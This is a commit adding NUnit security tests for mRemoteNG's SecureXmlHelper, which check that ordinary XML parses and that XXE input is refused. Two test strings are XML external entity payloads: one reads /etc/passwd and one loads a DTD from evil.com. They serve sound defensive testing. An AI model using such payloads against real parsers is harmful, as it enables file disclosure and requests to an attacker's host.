Add comprehensive security tests for SecureXmlHelper

Co-authored-by: Kvarkas <3611964+Kvarkas@users.noreply.github.com>
2026-02-17 22:11:48 +08:00 · 2025-10-07 15:24:35 +00:00
parent c405186533
commit cb7ba46be6
1 changed files with 90 additions and 0 deletions
--- a/mRemoteNGTests/Security/SecureXmlHelperTests.cs
+++ b/mRemoteNGTests/Security/SecureXmlHelperTests.cs
@@ -0,0 +1,90 @@
+using System;
+using System.Xml;
+using mRemoteNG.Security;
+using NUnit.Framework;
+
+namespace mRemoteNGTests.Security
+{
+    [TestFixture]
+    public class SecureXmlHelperTests
+    {
+        [Test]
+        public void LoadXmlFromString_LoadsValidXml()
+        {
+            string validXml = "<?xml version=\"1.0\"?><root><item>test</item></root>";
+            XmlDocument doc = SecureXmlHelper.LoadXmlFromString(validXml);
+            
+            Assert.That(doc, Is.Not.Null);
+            Assert.That(doc.DocumentElement?.Name, Is.EqualTo("root"));
+            Assert.That(doc.SelectSingleNode("/root/item")?.InnerText, Is.EqualTo("test"));
+        }
+
+        [Test]
+        public void LoadXmlFromString_RejectsXxeAttack()
+        {
+            // This is a typical XXE attack payload
+            string xxeXml = @"<?xml version='1.0'?>
+<!DOCTYPE foo [
+<!ELEMENT foo ANY >
+<!ENTITY xxe SYSTEM 'file:///etc/passwd' >]>
+<root><item>&xxe;</item></root>";
+
+            // Should throw exception because DTD processing is prohibited
+            Assert.Throws<XmlException>(() => SecureXmlHelper.LoadXmlFromString(xxeXml));
+        }
+
+        [Test]
+        public void CreateSecureXmlDocument_HasNullXmlResolver()
+        {
+            XmlDocument doc = SecureXmlHelper.CreateSecureXmlDocument();
+            
+            Assert.That(doc, Is.Not.Null);
+            Assert.That(doc.XmlResolver, Is.Null);
+        }
+
+        [Test]
+        public void LoadXmlFromString_RejectsExternalEntity()
+        {
+            // Another XXE variant using external entity
+            string externalEntityXml = @"<?xml version='1.0'?>
+<!DOCTYPE foo [
+<!ENTITY ext SYSTEM 'http://evil.com/malicious.dtd'>
+]>
+<root>&ext;</root>";
+
+            Assert.Throws<XmlException>(() => SecureXmlHelper.LoadXmlFromString(externalEntityXml));
+        }
+
+        [Test]
+        public void LoadXmlFromString_HandlesXmlWithComments()
+        {
+            string xmlWithComments = @"<?xml version='1.0'?>
+<root>
+    <!-- This is a comment -->
+    <item>test</item>
+</root>";
+
+            // Comments should be ignored per the secure settings
+            XmlDocument doc = SecureXmlHelper.LoadXmlFromString(xmlWithComments);
+            
+            Assert.That(doc, Is.Not.Null);
+            Assert.That(doc.DocumentElement?.Name, Is.EqualTo("root"));
+        }
+
+        [Test]
+        public void LoadXmlFromString_HandlesXmlWithProcessingInstructions()
+        {
+            string xmlWithPi = @"<?xml version='1.0'?>
+<?xml-stylesheet type='text/xsl' href='style.xsl'?>
+<root>
+    <item>test</item>
+</root>";
+
+            // Processing instructions should be ignored per the secure settings
+            XmlDocument doc = SecureXmlHelper.LoadXmlFromString(xmlWithPi);
+            
+            Assert.That(doc, Is.Not.Null);
+            Assert.That(doc.DocumentElement?.Name, Is.EqualTo("root"));
+        }
+    }
+}